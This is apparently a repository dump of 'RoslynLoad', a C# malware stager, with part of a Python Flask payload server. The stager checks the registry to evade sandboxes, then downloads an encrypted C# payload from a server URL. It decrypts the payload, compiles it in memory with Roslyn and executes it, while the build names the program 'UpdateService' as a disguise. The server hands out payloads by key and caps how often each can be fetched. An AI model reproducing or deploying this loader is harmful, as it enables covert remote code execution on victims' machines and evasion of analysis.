 1 | ﻿using System;
 2 | using Microsoft.Win32;
 3 | 
 4 | namespace RoslynLoad
 5 | {
 6 |     public  class Check
 7 |     {
 8 |         public static bool RunCheck()
 9 |         {
10 |             var MinimumUSBHistory = 2;
11 |             var MinimumBrowserCount = 2;
12 |             var browserCount = 0;
13 |             try
14 |             {
15 |                 var OpenedKey = Registry.LocalMachine.OpenSubKey(@"SYSTEM\ControlSet001\Enum\USBSTOR", false);
16 | 
17 |                 if (OpenedKey.GetSubKeyNames().Length <= MinimumUSBHistory)
18 |                 {
19 |                     return false;
20 |                 }
21 | 
22 |                 string[] browserKeys = { @"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe", @"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe", @"SOFTWARE\Mozilla" };
23 | 
24 |                 foreach (var browserKey in browserKeys)
25 |                 {
26 |                     OpenedKey = Registry.LocalMachine.OpenSubKey(browserKey, false);
27 |                     if (OpenedKey != null)
28 |                     {
29 |                         browserCount += 1;
30 |                     }
31 |                 }
32 | 
33 |                 if (browserCount >= MinimumBrowserCount)
34 |                 {
35 |                     return true;
36 |                 }
37 |                 return false;
38 |             }
39 |             catch
40 |             {
41 |                 return false;
42 |             }
43 |             
44 |         }
45 |     }
46 | }
47 | 


--------------------------------------------------------------------------------
/RoslynLoad/RoslynLoad/Encrypt.cs:
--------------------------------------------------------------------------------
 1 | ﻿using System;
 2 | using System.IO;
 3 | using System.Security.Cryptography;
 4 | using System.Text;
 5 | 
 6 | namespace RoslynLoad
 7 | {
 8 | 
 9 |     public static class Encrypt
10 |     {
11 |         //Decrypt
12 |         public static string DecryptString(string cipherText, string key)
13 |         {
14 |             byte[] bytes = Decrypt(Convert.FromBase64String(cipherText), key);
15 |             var utf8 = Encoding.UTF8.GetString(bytes);
16 |             return utf8;
17 |         }
18 | 
19 |         private static byte[] Decrypt(byte[] bytes, string key)
20 |         {
21 |             byte[] iv = new byte[16]; // change
22 |             Array.Copy(bytes, iv, 16); // change
23 |             AesManaged algorithm = new AesManaged();
24 |             algorithm.IV = iv; // change
25 | 
26 |             algorithm.Key = Encoding.UTF8.GetBytes(key);
27 | 
28 |             byte[] ret = null;
29 |             using (var decryptor = algorithm.CreateDecryptor())
30 |             {
31 |                 using (MemoryStream msDecrypted = new MemoryStream())
32 |                 {
33 |                     using (CryptoStream csEncrypt = new CryptoStream(msDecrypted, decryptor, CryptoStreamMode.Write))
34 |                     {
35 |                         csEncrypt.Write(bytes, 16, bytes.Length - 16); // change
36 |                     }
37 |                     ret = msDecrypted.ToArray();
38 |                 }
39 |             }
40 |             return ret;
41 |         }
42 |     }
43 | 
44 | }
45 | 


--------------------------------------------------------------------------------
/RoslynLoad/RoslynLoad/Program.cs:
--------------------------------------------------------------------------------
 1 | ﻿using Microsoft.CodeAnalysis;
 2 | using Microsoft.CodeAnalysis.CSharp;
 3 | using Microsoft.CodeAnalysis.Emit;
 4 | using System;
 5 | using System.Collections.Generic;
 6 | using System.IO;
 7 | using System.Linq;
 8 | using System.Net;
 9 | using System.Reflection;
10 | 
11 | namespace RoslynLoad
12 | {
13 |     class Program
14 |     {
15 |         static void Main(string[] args)
16 |         {
17 |             if (!Check.RunCheck())
18 |             {
19 |                 return;
20 |             }
21 |             string server = args[0];
22 |             string key = server.Split('/')[3];
23 | 
24 |             var code = Fetch(server);
25 |             try
26 |             {
27 |                 code = Encrypt.DecryptString(code, key);
28 |             }
29 |             catch(Exception ex)
30 |             {
31 |                 Console.WriteLine(ex.Message);
32 |                 return;
33 |             }
34 |             
35 |             SyntaxTree syntaxTree = CSharpSyntaxTree.ParseText(code);
36 | 
37 |             string assemblyName = Path.GetRandomFileName();
38 |             MetadataReference[] references = new MetadataReference[]
39 |             {
40 |                 MetadataReference.CreateFromFile(typeof(object).Assembly.Location),
41 |                 MetadataReference.CreateFromFile(typeof(Enumerable).Assembly.Location),
42 |                 MetadataReference.CreateFromFile(typeof(System.IO.Compression.GZipStream).Assembly.Location)
43 |             };
44 | 
45 |             CSharpCompilation compilation = CSharpCompilation.Create(
46 |                 assemblyName,
47 |                 syntaxTrees: new[] { syntaxTree },
48 |                 references: references,
49 |                 options: new CSharpCompilationOptions(OutputKind.DynamicallyLinkedLibrary, allowUnsafe: true));
50 | 
51 |             using (var ms = new MemoryStream())
52 |             {
53 |                 EmitResult result = compilation.Emit(ms);
54 | 
55 |                 if (!result.Success)
56 |                 {
57 |                     return;
58 |                 }
59 |                 else
60 |                 {
61 |                     ms.Seek(0, SeekOrigin.Begin);
62 |                     Assembly assembly = Assembly.Load(ms.ToArray());
63 | 
64 |                     try
65 |                     {
66 |                         Type type = assembly.GetType("Inception.Program");
67 |                         object obj = Activator.CreateInstance(type);
68 |                         type.InvokeMember("Run",
69 |                             BindingFlags.Default | BindingFlags.InvokeMethod,
70 |                             null,
71 |                             obj,
72 |                             new object[] { });
73 |                     }
74 |                     catch (Exception ex)
75 |                     {
76 |                         Console.WriteLine(ex.Message);
77 |                     }
78 |                 }
79 |             }
80 | 
81 |             Console.ReadLine();
82 |         }
83 | 
84 |         private static string Fetch(string URL)
85 |         {
86 |             WebClient client = new WebClient();
87 |             Stream stream = client.OpenRead(URL);
88 |             StreamReader reader = new StreamReader(stream);
89 |             return reader.ReadToEnd();
90 |         }
91 | 
92 |        
93 |     }
94 | }
95 | 


--------------------------------------------------------------------------------
/RoslynLoad/RoslynLoad/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | ﻿using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("RoslynLoad")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("RoslynLoad")]
13 | [assembly: AssemblyCopyright("Copyright ©  2018")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components.  If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("03d96b8c-efd1-44a9-8db2-0b74db5d247a")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/RoslynLoad/RoslynLoad/RoslynLoad.csproj:
--------------------------------------------------------------------------------
  1 | ﻿<?xml version="1.0" encoding="utf-8"?>
  2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
  4 |   <PropertyGroup>
  5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
  6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
  7 |     <ProjectGuid>{03D96B8C-EFD1-44A9-8DB2-0B74DB5D247A}</ProjectGuid>
  8 |     <OutputType>WinExe</OutputType>
  9 |     <RootNamespace>RoslynLoad</RootNamespace>
 10 |     <AssemblyName>UpdateService</AssemblyName>
 11 |     <TargetFrameworkVersion>v4.6.1</TargetFrameworkVersion>
 12 |     <FileAlignment>512</FileAlignment>
 13 |     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
 14 |     <NuGetPackageImportStamp>
 15 |     </NuGetPackageImportStamp>
 16 |   </PropertyGroup>
 17 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
 18 |     <PlatformTarget>AnyCPU</PlatformTarget>
 19 |     <DebugSymbols>true</DebugSymbols>
 20 |     <DebugType>full</DebugType>
 21 |     <Optimize>false</Optimize>
 22 |     <OutputPath>bin\Debug\</OutputPath>
 23 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
 24 |     <ErrorReport>prompt</ErrorReport>
 25 |     <WarningLevel>4</WarningLevel>
 26 |   </PropertyGroup>
 27 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
 28 |     <PlatformTarget>AnyCPU</PlatformTarget>
 29 |     <DebugType>pdbonly</DebugType>
 30 |     <Optimize>true</Optimize>
 31 |     <OutputPath>bin\Release\</OutputPath>
 32 |     <DefineConstants>TRACE</DefineConstants>
 33 |     <ErrorReport>prompt</ErrorReport>
 34 |     <WarningLevel>4</WarningLevel>
 35 |   </PropertyGroup>
 36 |   <PropertyGroup>
 37 |     <StartupObject />
 38 |   </PropertyGroup>
 39 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
 40 |     <DebugSymbols>true</DebugSymbols>
 41 |     <OutputPath>bin\x64\Debug\</OutputPath>
 42 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
 43 |     <DebugType>full</DebugType>
 44 |     <PlatformTarget>x64</PlatformTarget>
 45 |     <ErrorReport>prompt</ErrorReport>
 46 |     <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
 47 |     <Prefer32Bit>true</Prefer32Bit>
 48 |   </PropertyGroup>
 49 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
 50 |     <OutputPath>bin\x64\Release\</OutputPath>
 51 |     <DefineConstants>TRACE</DefineConstants>
 52 |     <Optimize>true</Optimize>
 53 |     <DebugType>pdbonly</DebugType>
 54 |     <PlatformTarget>x64</PlatformTarget>
 55 |     <ErrorReport>prompt</ErrorReport>
 56 |     <CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
 57 |     <Prefer32Bit>true</Prefer32Bit>
 58 |   </PropertyGroup>
 59 |   <ItemGroup>
 60 |     <Reference Include="Costura, Version=2.0.1.0, Culture=neutral, PublicKeyToken=9919ef960d84173d, processorArchitecture=MSIL">
 61 |       <HintPath>..\packages\Costura.Fody.2.0.1\lib\net452\Costura.dll</HintPath>
 62 |     </Reference>
 63 |     <Reference Include="Microsoft.CodeAnalysis, Version=2.8.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
 64 |       <HintPath>..\packages\Microsoft.CodeAnalysis.Common.2.8.2\lib\netstandard1.3\Microsoft.CodeAnalysis.dll</HintPath>
 65 |     </Reference>
 66 |     <Reference Include="Microsoft.CodeAnalysis.CSharp, Version=2.8.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
 67 |       <HintPath>..\packages\Microsoft.CodeAnalysis.CSharp.2.8.2\lib\netstandard1.3\Microsoft.CodeAnalysis.CSharp.dll</HintPath>
 68 |     </Reference>
 69 |     <Reference Include="Microsoft.CodeAnalysis.CSharp.Workspaces, Version=2.8.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
 70 |       <HintPath>..\packages\Microsoft.CodeAnalysis.CSharp.Workspaces.2.8.2\lib\netstandard1.3\Microsoft.CodeAnalysis.CSharp.Workspaces.dll</HintPath>
 71 |     </Reference>
 72 |     <Reference Include="Microsoft.CodeAnalysis.Workspaces, Version=2.8.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
 73 |       <HintPath>..\packages\Microsoft.CodeAnalysis.Workspaces.Common.2.8.2\lib\net46\Microsoft.CodeAnalysis.Workspaces.dll</HintPath>
 74 |     </Reference>
 75 |     <Reference Include="Microsoft.CodeAnalysis.Workspaces.Desktop, Version=2.8.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
 76 |       <HintPath>..\packages\Microsoft.CodeAnalysis.Workspaces.Common.2.8.2\lib\net46\Microsoft.CodeAnalysis.Workspaces.Desktop.dll</HintPath>
 77 |     </Reference>
 78 |     <Reference Include="Mono.Cecil, Version=0.10.0.0, Culture=neutral, PublicKeyToken=50cebf1cceb9d05e, processorArchitecture=MSIL">
 79 |       <HintPath>..\packages\Mono.Cecil.0.10.0\lib\net40\Mono.Cecil.dll</HintPath>
 80 |     </Reference>
 81 |     <Reference Include="Mono.Cecil.Mdb, Version=0.10.0.0, Culture=neutral, PublicKeyToken=50cebf1cceb9d05e, processorArchitecture=MSIL">
 82 |       <HintPath>..\packages\Mono.Cecil.0.10.0\lib\net40\Mono.Cecil.Mdb.dll</HintPath>
 83 |     </Reference>
 84 |     <Reference Include="Mono.Cecil.Pdb, Version=0.10.0.0, Culture=neutral, PublicKeyToken=50cebf1cceb9d05e, processorArchitecture=MSIL">
 85 |       <HintPath>..\packages\Mono.Cecil.0.10.0\lib\net40\Mono.Cecil.Pdb.dll</HintPath>
 86 |     </Reference>
 87 |     <Reference Include="Mono.Cecil.Rocks, Version=0.10.0.0, Culture=neutral, PublicKeyToken=50cebf1cceb9d05e, processorArchitecture=MSIL">
 88 |       <HintPath>..\packages\Mono.Cecil.0.10.0\lib\net40\Mono.Cecil.Rocks.dll</HintPath>
 89 |     </Reference>
 90 |     <Reference Include="System" />
 91 |     <Reference Include="System.AppContext, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
 92 |       <HintPath>..\packages\System.AppContext.4.3.0\lib\net46\System.AppContext.dll</HintPath>
 93 |       <Private>True</Private>
 94 |     </Reference>
 95 |     <Reference Include="System.Collections.Immutable, Version=1.2.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
 96 |       <HintPath>..\packages\System.Collections.Immutable.1.3.1\lib\portable-net45+win8+wp8+wpa81\System.Collections.Immutable.dll</HintPath>
 97 |       <Private>True</Private>
 98 |     </Reference>
 99 |     <Reference Include="System.ComponentModel.Composition" />
100 |     <Reference Include="System.Composition.AttributedModel, Version=1.0.31.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
101 |       <HintPath>..\packages\System.Composition.AttributedModel.1.0.31\lib\portable-net45+win8+wp8+wpa81\System.Composition.AttributedModel.dll</HintPath>
102 |     </Reference>
103 |     <Reference Include="System.Composition.Convention, Version=1.0.31.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
104 |       <HintPath>..\packages\System.Composition.Convention.1.0.31\lib\portable-net45+win8+wp8+wpa81\System.Composition.Convention.dll</HintPath>
105 |     </Reference>
106 |     <Reference Include="System.Composition.Hosting, Version=1.0.31.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
107 |       <HintPath>..\packages\System.Composition.Hosting.1.0.31\lib\portable-net45+win8+wp8+wpa81\System.Composition.Hosting.dll</HintPath>
108 |     </Reference>
109 |     <Reference Include="System.Composition.Runtime, Version=1.0.31.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
110 |       <HintPath>..\packages\System.Composition.Runtime.1.0.31\lib\portable-net45+win8+wp8+wpa81\System.Composition.Runtime.dll</HintPath>
111 |     </Reference>
112 |     <Reference Include="System.Composition.TypedParts, Version=1.0.31.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
113 |       <HintPath>..\packages\System.Composition.TypedParts.1.0.31\lib\portable-net45+win8+wp8+wpa81\System.Composition.TypedParts.dll</HintPath>
114 |     </Reference>
115 |     <Reference Include="System.Console, Version=4.0.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
116 |       <HintPath>..\packages\System.Console.4.3.0\lib\net46\System.Console.dll</HintPath>
117 |     </Reference>
118 |     <Reference Include="System.Core" />
119 |     <Reference Include="System.Diagnostics.FileVersionInfo, Version=4.0.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
120 |       <HintPath>..\packages\System.Diagnostics.FileVersionInfo.4.3.0\lib\net46\System.Diagnostics.FileVersionInfo.dll</HintPath>
121 |     </Reference>
122 |     <Reference Include="System.Diagnostics.StackTrace, Version=4.0.3.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
123 |       <HintPath>..\packages\System.Diagnostics.StackTrace.4.3.0\lib\net46\System.Diagnostics.StackTrace.dll</HintPath>
124 |     </Reference>
125 |     <Reference Include="System.IO.Compression, Version=4.1.2.0, Culture=neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=MSIL">
126 |       <HintPath>..\packages\System.IO.Compression.4.3.0\lib\net46\System.IO.Compression.dll</HintPath>
127 |       <Private>True</Private>
128 |     </Reference>
129 |     <Reference Include="System.IO.FileSystem, Version=4.0.2.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
130 |       <HintPath>..\packages\System.IO.FileSystem.4.3.0\lib\net46\System.IO.FileSystem.dll</HintPath>
131 |     </Reference>
132 |     <Reference Include="System.IO.FileSystem.Primitives, Version=4.0.2.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
133 |       <HintPath>..\packages\System.IO.FileSystem.Primitives.4.3.0\lib\net46\System.IO.FileSystem.Primitives.dll</HintPath>
134 |     </Reference>
135 |     <Reference Include="System.Numerics" />
136 |     <Reference Include="System.Reflection.Metadata, Version=1.4.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
137 |       <HintPath>..\packages\System.Reflection.Metadata.1.4.2\lib\portable-net45+win8\System.Reflection.Metadata.dll</HintPath>
138 |     </Reference>
139 |     <Reference Include="System.Security.Cryptography.Algorithms, Version=4.1.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
140 |       <HintPath>..\packages\System.Security.Cryptography.Algorithms.4.3.0\lib\net461\System.Security.Cryptography.Algorithms.dll</HintPath>
141 |     </Reference>
142 |     <Reference Include="System.Security.Cryptography.Encoding, Version=4.0.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
143 |       <HintPath>..\packages\System.Security.Cryptography.Encoding.4.3.0\lib\net46\System.Security.Cryptography.Encoding.dll</HintPath>
144 |     </Reference>
145 |     <Reference Include="System.Security.Cryptography.Primitives, Version=4.0.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
146 |       <HintPath>..\packages\System.Security.Cryptography.Primitives.4.3.0\lib\net46\System.Security.Cryptography.Primitives.dll</HintPath>
147 |     </Reference>
148 |     <Reference Include="System.Security.Cryptography.X509Certificates, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
149 |       <HintPath>..\packages\System.Security.Cryptography.X509Certificates.4.3.0\lib\net461\System.Security.Cryptography.X509Certificates.dll</HintPath>
150 |     </Reference>
151 |     <Reference Include="System.Text.Encoding.CodePages, Version=4.0.2.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
152 |       <HintPath>..\packages\System.Text.Encoding.CodePages.4.3.0\lib\net46\System.Text.Encoding.CodePages.dll</HintPath>
153 |     </Reference>
154 |     <Reference Include="System.Threading.Thread, Version=4.0.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
155 |       <HintPath>..\packages\System.Threading.Thread.4.3.0\lib\net46\System.Threading.Thread.dll</HintPath>
156 |     </Reference>
157 |     <Reference Include="System.ValueTuple, Version=4.0.1.0, Culture=neutral, PublicKeyToken=cc7b13ffcd2ddd51, processorArchitecture=MSIL">
158 |       <HintPath>..\packages\System.ValueTuple.4.3.0\lib\netstandard1.0\System.ValueTuple.dll</HintPath>
159 |     </Reference>
160 |     <Reference Include="System.Xml.Linq" />
161 |     <Reference Include="System.Data.DataSetExtensions" />
162 |     <Reference Include="Microsoft.CSharp" />
163 |     <Reference Include="System.Data" />
164 |     <Reference Include="System.Net.Http" />
165 |     <Reference Include="System.Xml" />
166 |     <Reference Include="System.Xml.ReaderWriter, Version=4.1.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
167 |       <HintPath>..\packages\System.Xml.ReaderWriter.4.3.0\lib\net46\System.Xml.ReaderWriter.dll</HintPath>
168 |     </Reference>
169 |     <Reference Include="System.Xml.XmlDocument, Version=4.0.2.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
170 |       <HintPath>..\packages\System.Xml.XmlDocument.4.3.0\lib\net46\System.Xml.XmlDocument.dll</HintPath>
171 |     </Reference>
172 |     <Reference Include="System.Xml.XPath, Version=4.0.2.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
173 |       <HintPath>..\packages\System.Xml.XPath.4.3.0\lib\net46\System.Xml.XPath.dll</HintPath>
174 |     </Reference>
175 |     <Reference Include="System.Xml.XPath.XDocument, Version=4.0.2.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
176 |       <HintPath>..\packages\System.Xml.XPath.XDocument.4.3.0\lib\net46\System.Xml.XPath.XDocument.dll</HintPath>
177 |     </Reference>
178 |   </ItemGroup>
179 |   <ItemGroup>
180 |     <Compile Include="Check.cs" />
181 |     <Compile Include="Encrypt.cs" />
182 |     <Compile Include="Program.cs" />
183 |     <Compile Include="Properties\AssemblyInfo.cs" />
184 |   </ItemGroup>
185 |   <ItemGroup>
186 |     <None Include="App.config" />
187 |     <None Include="packages.config" />
188 |   </ItemGroup>
189 |   <ItemGroup>
190 |     <Analyzer Include="..\packages\Microsoft.CodeAnalysis.Analyzers.1.1.0\analyzers\dotnet\cs\Microsoft.CodeAnalysis.Analyzers.dll" />
191 |     <Analyzer Include="..\packages\Microsoft.CodeAnalysis.Analyzers.1.1.0\analyzers\dotnet\cs\Microsoft.CodeAnalysis.CSharp.Analyzers.dll" />
192 |   </ItemGroup>
193 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
194 |   <Import Project="..\packages\Fody.3.0.3\build\Fody.targets" Condition="Exists('..\packages\Fody.3.0.3\build\Fody.targets')" />
195 |   <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
196 |     <PropertyGroup>
197 |       <ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them.  For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
198 |     </PropertyGroup>
199 |     <Error Condition="!Exists('..\packages\Fody.3.0.3\build\Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Fody.3.0.3\build\Fody.targets'))" />
200 |     <Error Condition="!Exists('..\packages\Costura.Fody.2.0.1\build\Costura.Fody.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Costura.Fody.2.0.1\build\Costura.Fody.targets'))" />
201 |   </Target>
202 |   <Import Project="..\packages\Costura.Fody.2.0.1\build\Costura.Fody.targets" Condition="Exists('..\packages\Costura.Fody.2.0.1\build\Costura.Fody.targets')" />
203 | </Project>


--------------------------------------------------------------------------------
/RoslynLoad/RoslynLoad/RoslynLoad.csproj.user:
--------------------------------------------------------------------------------
 1 | ﻿<?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <PropertyGroup>
 4 |     <ProjectView>ShowAllFiles</ProjectView>
 5 |   </PropertyGroup>
 6 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
 7 |     <StartArguments>"http://192.168.1.66/a239321996eb0ef6"</StartArguments>
 8 |   </PropertyGroup>
 9 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
10 |     <StartArguments>"http://192.168.1.66/93c334b700c51e69"</StartArguments>
11 |   </PropertyGroup>
12 | </Project>


--------------------------------------------------------------------------------
/RoslynLoad/RoslynLoad/packages.config:
--------------------------------------------------------------------------------
 1 | ﻿<?xml version="1.0" encoding="utf-8"?>
 2 | <packages>
 3 |   <package id="Costura.Fody" version="2.0.1" targetFramework="net461" />
 4 |   <package id="Fody" version="3.0.3" targetFramework="net461" developmentDependency="true" />
 5 |   <package id="Microsoft.CodeAnalysis.Analyzers" version="1.1.0" targetFramework="net461" />
 6 |   <package id="Microsoft.CodeAnalysis.Common" version="2.8.2" targetFramework="net461" />
 7 |   <package id="Microsoft.CodeAnalysis.CSharp" version="2.8.2" targetFramework="net461" />
 8 |   <package id="Microsoft.CodeAnalysis.CSharp.Workspaces" version="2.8.2" targetFramework="net461" />
 9 |   <package id="Microsoft.CodeAnalysis.Workspaces.Common" version="2.8.2" targetFramework="net461" />
10 |   <package id="Mono.Cecil" version="0.10.0" targetFramework="net461" />
11 |   <package id="System.AppContext" version="4.3.0" targetFramework="net461" />
12 |   <package id="System.Collections" version="4.3.0" targetFramework="net461" />
13 |   <package id="System.Collections.Concurrent" version="4.3.0" targetFramework="net461" />
14 |   <package id="System.Collections.Immutable" version="1.3.1" targetFramework="net461" />
15 |   <package id="System.Composition" version="1.0.31" targetFramework="net461" />
16 |   <package id="System.Composition.AttributedModel" version="1.0.31" targetFramework="net461" />
17 |   <package id="System.Composition.Convention" version="1.0.31" targetFramework="net461" />
18 |   <package id="System.Composition.Hosting" version="1.0.31" targetFramework="net461" />
19 |   <package id="System.Composition.Runtime" version="1.0.31" targetFramework="net461" />
20 |   <package id="System.Composition.TypedParts" version="1.0.31" targetFramework="net461" />
21 |   <package id="System.Console" version="4.3.0" targetFramework="net461" />
22 |   <package id="System.Diagnostics.Debug" version="4.3.0" targetFramework="net461" />
23 |   <package id="System.Diagnostics.FileVersionInfo" version="4.3.0" targetFramework="net461" />
24 |   <package id="System.Diagnostics.StackTrace" version="4.3.0" targetFramework="net461" />
25 |   <package id="System.Diagnostics.Tools" version="4.3.0" targetFramework="net461" />
26 |   <package id="System.Dynamic.Runtime" version="4.3.0" targetFramework="net461" />
27 |   <package id="System.Globalization" version="4.3.0" targetFramework="net461" />
28 |   <package id="System.IO.Compression" version="4.3.0" targetFramework="net461" />
29 |   <package id="System.IO.FileSystem" version="4.3.0" targetFramework="net461" />
30 |   <package id="System.IO.FileSystem.Primitives" version="4.3.0" targetFramework="net461" />
31 |   <package id="System.Linq" version="4.3.0" targetFramework="net461" />
32 |   <package id="System.Linq.Expressions" version="4.3.0" targetFramework="net461" />
33 |   <package id="System.Reflection" version="4.3.0" targetFramework="net461" />
34 |   <package id="System.Reflection.Metadata" version="1.4.2" targetFramework="net461" />
35 |   <package id="System.Resources.ResourceManager" version="4.3.0" targetFramework="net461" />
36 |   <package id="System.Runtime" version="4.3.0" targetFramework="net461" />
37 |   <package id="System.Runtime.Extensions" version="4.3.0" targetFramework="net461" />
38 |   <package id="System.Runtime.InteropServices" version="4.3.0" targetFramework="net461" />
39 |   <package id="System.Runtime.Numerics" version="4.3.0" targetFramework="net461" />
40 |   <package id="System.Security.Cryptography.Algorithms" version="4.3.0" targetFramework="net461" />
41 |   <package id="System.Security.Cryptography.Encoding" version="4.3.0" targetFramework="net461" />
42 |   <package id="System.Security.Cryptography.Primitives" version="4.3.0" targetFramework="net461" />
43 |   <package id="System.Security.Cryptography.X509Certificates" version="4.3.0" targetFramework="net461" />
44 |   <package id="System.Text.Encoding" version="4.3.0" targetFramework="net461" />
45 |   <package id="System.Text.Encoding.CodePages" version="4.3.0" targetFramework="net461" />
46 |   <package id="System.Text.Encoding.Extensions" version="4.3.0" targetFramework="net461" />
47 |   <package id="System.Threading" version="4.3.0" targetFramework="net461" />
48 |   <package id="System.Threading.Tasks" version="4.3.0" targetFramework="net461" />
49 |   <package id="System.Threading.Tasks.Parallel" version="4.3.0" targetFramework="net461" />
50 |   <package id="System.Threading.Thread" version="4.3.0" targetFramework="net461" />
51 |   <package id="System.ValueTuple" version="4.3.0" targetFramework="net461" />
52 |   <package id="System.Xml.ReaderWriter" version="4.3.0" targetFramework="net461" />
53 |   <package id="System.Xml.XDocument" version="4.3.0" targetFramework="net461" />
54 |   <package id="System.Xml.XmlDocument" version="4.3.0" targetFramework="net461" />
55 |   <package id="System.Xml.XPath" version="4.3.0" targetFramework="net461" />
56 |   <package id="System.Xml.XPath.XDocument" version="4.3.0" targetFramework="net461" />
57 | </packages>


--------------------------------------------------------------------------------
/Server.py:
--------------------------------------------------------------------------------
 1 | from flask import Flask, redirect
 2 | from Classes.DB import *
 3 | 
 4 | app = Flask(__name__)
 5 | redirectURL = "https://www.youtube.com/watch?v=dQw4w9WgXcQ" #change this as needed
 6 | 
 7 | @app.route("/<string:key>")
 8 | def getPayload(key):
 9 | 	#fetch the payload from the db
10 | 	payload = Get_Payload(key)
11 | 	if payload is None:
12 | 		return redirect(redirectURL, code=302)
13 | 	#check the number of times the payload has been fetched does not exceed the number allowed
14 | 	if payload['access_count'] < payload['allowed_access_count']:
15 | 		#return the payload
16 | 		with open(payload['file_path']) as f:
17 | 			payload_string = f.read()
18 | 		#increment the number of reads before returning the file
19 | 		Increment_Access_count(key)
